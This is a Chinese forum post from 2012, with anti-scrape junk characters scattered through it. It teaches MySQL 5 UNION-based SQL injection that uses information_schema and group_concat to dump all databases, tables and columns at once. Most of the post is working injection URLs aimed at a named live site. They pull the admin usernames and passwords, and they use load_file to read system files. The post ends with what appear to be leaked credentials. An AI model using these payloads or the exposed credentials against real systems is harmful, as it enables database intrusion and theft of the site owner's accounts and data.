此方法只适用于Mysql 5.0以及5.0以上版本 注入方法和mysql 5 类似
8 T- T3 P/ N. n但此方法大大提高了读取数据库的速度,此方法并非本人原创,原创出处是国外某牛人
1 w. S3 B* [+ z
. I7 i5 f" R3 c
1 E/ q/ p' Q6 a$ h8 n' Z( B+ `优点在于可以利用information_schema库与group_concat的配合 来达到一次性读取出指定数据库里的内容,并且在limit被限制的情况下依然可以注入
" V$ p0 W2 m9 L, r% k6 Y, P* |$ f9 U5 a$ }
缺点 当一个库存在几百甚至几千个表和表字段和数据的时候 读取出数据的时间会相当的慢...
# p- c. }, ~" j( d; @0 j7 s2 E7 ^ U
下面用简单实例来演示 原理不多说,相信经常玩注入的朋友都知道了.只挑重要部分实例演示
! v: D, Y3 \$ l3 I3 b: a6 M在注入时根据实际情况作出变化 比如过滤了空格,使用/**/ , + 等等" T) q" C' `% W
4 C, K* @7 l. J3 [4 t. u1 j; E* [" K
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,database(),10,11,12,13,14,15,16,17
( T* h8 l3 M1 w* S- P; `8 J9 x3 m8 K4 p! C4 J
读出所有库:, A3 @* M$ ?. I8 M
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(schema_name),10,11,12,13,14,15,16,17 from information_schema.SCHEMATA
# {) b; r+ }5 q$ v2 r) C5 W. B5 F% f
2 H/ z4 E$ N2 L1 m* `: V# p; w
; b2 @) A$ N$ U% X. f7 {+ w
`6 d! p7 t F$ E& r读出所有表:
" p; X! I2 O. N8 p8 X( G7 X1 A) Mhttp://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(table_name),10,11,12,13,14,15,16,17 from information_schema.tables where table_schema=database()" L. N! V+ |' T1 h4 t$ S2 F& p; q
t! X" t$ h, U m2 y3 A9 I( b# e1 f读出所有表字段:
! ^- b: S, [) U v" M) Q, R, [http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,8,group_concat(column_name),10,11,12,13,14,15,16,17 from information_schema.COLUMNS where table_schema=database() and table_name=char(97,100,109,105,110). ^$ ^* `9 w" ?6 Q4 H/ l
*/ (97,100,109,105,110)为admin的ascii码 依次类推
- r; U- X# f- w7 O ?/ X# r( J% }- I* n7 h! a' }
读出所有表字段里的内容: z* H) R9 N! Q5 K
http://www.political-security.com/1.php?id=-1 union select 1,2,3,4,5,6,7,group_concat(password),group_concat(admin),10,11,12,13,14,15,16,17 from admin
7 I1 h% U6 z* I' C T9 B% u. }) \% o/ m. |, G- w$ R
3 r, o2 ^. U k! Q; `( [ A+ ]+ E5 B
- p! a2 B# R3 F( y0 H/ `, O2 v7 ` W, t& z: [) |
- U* E8 D- d. d2 {: W( f0 ~http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),load_file(CHAR(99, 58, 92, 98, 111, 111, 116, 46, 105, 110, 105)),4,5,6,7+%23
. h% w c, M! b4 V4 q
8 @$ M0 i" k6 T3 v; b( m/ i4 Z0 ~- s! T
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(schema_name),4,5,6,7+from+information_schema.schemata%23
; \$ u' B, x$ w$ j5 [
, A3 S$ `4 O/ Y% ehttp://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(column_name),4,5,6,7+from+information_schema.COLUMNS where table_schema=database()+and+table_name=char(97,100,109,105,110)%23
d( O7 y/ G% C9 k+ |8 M
* t- L) x. [; ]$ H7 R2 @% h6 X2 Y3 G/ ~& O
http://www.political-security.co ... ;&ssec=-1+UNION SELECT+1,CONCAT_WS(CHAR(32,58,32),user(),database(),version()),group_concat(admin_name,0x3a,admin_password),4,5,6,7+from+admin%23
4 \7 P9 I5 b( `! f0 _6 o
2 z& V8 p/ F/ v: T( u: W# m' f& M M: q# X, f0 b
webmaster:dzb521123,simlab:simadmin20043233
/ f* L9 D6 e! _, Q |
发表于 2012-9-13 16:37:34
收藏
支持
反对